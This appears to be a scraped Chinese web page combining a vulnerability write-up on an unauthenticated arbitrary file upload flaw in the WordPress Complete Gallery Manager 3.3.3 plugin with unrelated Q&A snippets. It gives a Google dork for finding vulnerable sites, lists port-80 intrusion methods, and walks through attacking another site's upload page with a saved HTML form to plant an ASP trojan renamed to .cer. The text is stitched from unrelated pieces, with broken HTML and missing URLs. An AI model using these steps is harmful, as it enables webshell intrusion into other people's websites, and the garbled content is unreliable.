WordPress插件任意文件上传漏洞 (wordpress网站建设)

教程大全 2025-07-08 08:50:40 浏览

使用WP的 Complete Gallery Manager 插件能够使你简单快捷地为你的网站建立一个相册集

这个插件提供了很多很多好用的功能, 但如果你的用户或是你自己不需要用到这些功能的话,请不要安装太多WP的插件.这样容易让你的WP过于复杂,让入侵者有可乘之机。

Complete Gallery Manager 一共有188个设置,其中有146个是使用单选框的形式,用来设置这个插件的功能。这样会让Complete Gallery Manager 设置起来更加安全、方便。

漏洞摘要:

一个独立漏洞研究实验室的研究人员发现了Wordpress插件 Complete Gallery Manager 3.3.3这个任意文件上传漏洞。

等级:

高危

分析:

WordPress插件Complete Gallery Manager 3.3.3任意文件上传漏洞允许远程的攻击者通过HTTP的POST方式上传文件,这个文件的扩展名可以是任意格式的,Complete Gallery Manager这个插件中没有严密的过滤代码来限制这些未经授权的特殊后缀名文件上传到 服务器 上。

产生这个漏洞的文件位于/plugins/complete-gallery-manager/frames/ 路径的upload-images.php文件上。 这个文件没有检查上传文件的内容,导致攻击者可以上传恶意文本内容或是webshells.

在上传文件之后,远程的攻击者还能够将文件的后缀名,从一个格式转换成为另一个格式。例如,你可以上传.jpg再将它转换成.php文件。

这个漏洞的利用,不需要与管理员发生互动,而且不需要有管理员的权限,甚至不需要普通用户的账号密码,就能完成这个攻击。

想要成功地利用这个漏洞,只需要以上的那个文件路径没有被服务器所禁止,只要能访问到/plugins/complete-gallery-manager/frames/upload-images.php这个路径,你就可以直接上传任意文件啦。

漏洞应用程序:

[+] CodeCanyon – Complete Gallery Manager

漏洞模块:

[+] Image File Upload

漏洞文件:

[+] upload-images.php

受影响的模块:

[+] 可影响整个WordPress系统 (

测试证明

这个任意文件上传漏洞,不需要与管理员发生互动,而且不需要有管理员的权限,甚至不需要普通用户的账号密码,就能完成这个攻击。

Google 语句:

allinurl:/wp-content/plugins/complete-gallery-manager/

漏洞页面(自己架设):

上传的shell地址 :


怎么通过80端口入侵?????

80端口可以有多种入侵的方法1、SQL注射漏洞2、上传漏洞3、文件包含漏洞4、社会工程学5、数据库下载漏洞6、列目录漏洞7、0DAY8、旁注

求零度白茶影视系统详细教程

先在baidu或google里搜索关键字“零度白茶”。

这里我已经找好了一个,_blank>,这次利用的是上传漏洞,所以我们在它后面加个.返回信息“请选择你要上传的图片”。 然后打开我们的上传页面。 这里我给出它的源码。 如下:

<!DOCTYPE HTML PUBLIC -//W3C//DTD HTML 4.0 Transitional//EN>

<!-- saved from url=(0055)_?PhotoUrlID=0 target=_blank>http-equiv=Content-Type content=text/html; charset=gb2312>

WordPress插件任意文件上传漏洞

<STYLE type=text/css>BODY {

FONT-SIZE: 9pt; BACKGROUND-COLOR: #e1f4ee

BORDER-RIGHT: # 1px solid; BORDER-TOP: # 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: # 1px solid; COLOR: #0000ff; BORDER-BOTTOM: # 1px solid; HEIGHT: 20px

</STYLE>

<META content=MSHTML 6.00.2800.1400 name=GENERATOR></HEAD>

<BODY leftMargin=0 topMargin=0>

<FORM name=form1 action=method=post

encType=multipart/form-data><INPUT class=tx1 type=file size=30 name=FileName> <INPUT class=tx1 type=file size=30 name=FileName1> <INPUT type=submit value=上传 name=Submit>

<INPUT id=PhotoUrlID type=hidden value=0 name=PhotoUrlID> </FORM></BODY></HTML>

保存为

<FORM name=form1 action=method=post

这里的_blank>请换成你找到的漏洞站点。

然后随便选择一张图片,找一个asp木马,什么样的asp木马都可以,现在的海洋木马很流行,不过需要注意的是后缀名一定要保存为cer格式的。 着里我已经做好了。

接着打开第一个框里传图片,第二个传我们的后缀cer的asp木马,接着点上传。

如果上传成功的话,就回出现“图片上传成功! 图片上传成功! ”。 看下他的源码。

怎样用邮箱发文件

可以在邮件里面添加附件不过附件一般不会太大如果需要将大文件传给对方,这时候可以利用漏洞将文件附加到bmp图片文件上以图片的方式发出去,对方接收的时候再把文件切回来,就可以实现大容量附件传送。

本文版权声明本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,请联系本站客服,一经查实,本站将立刻删除。

发表评论

热门推荐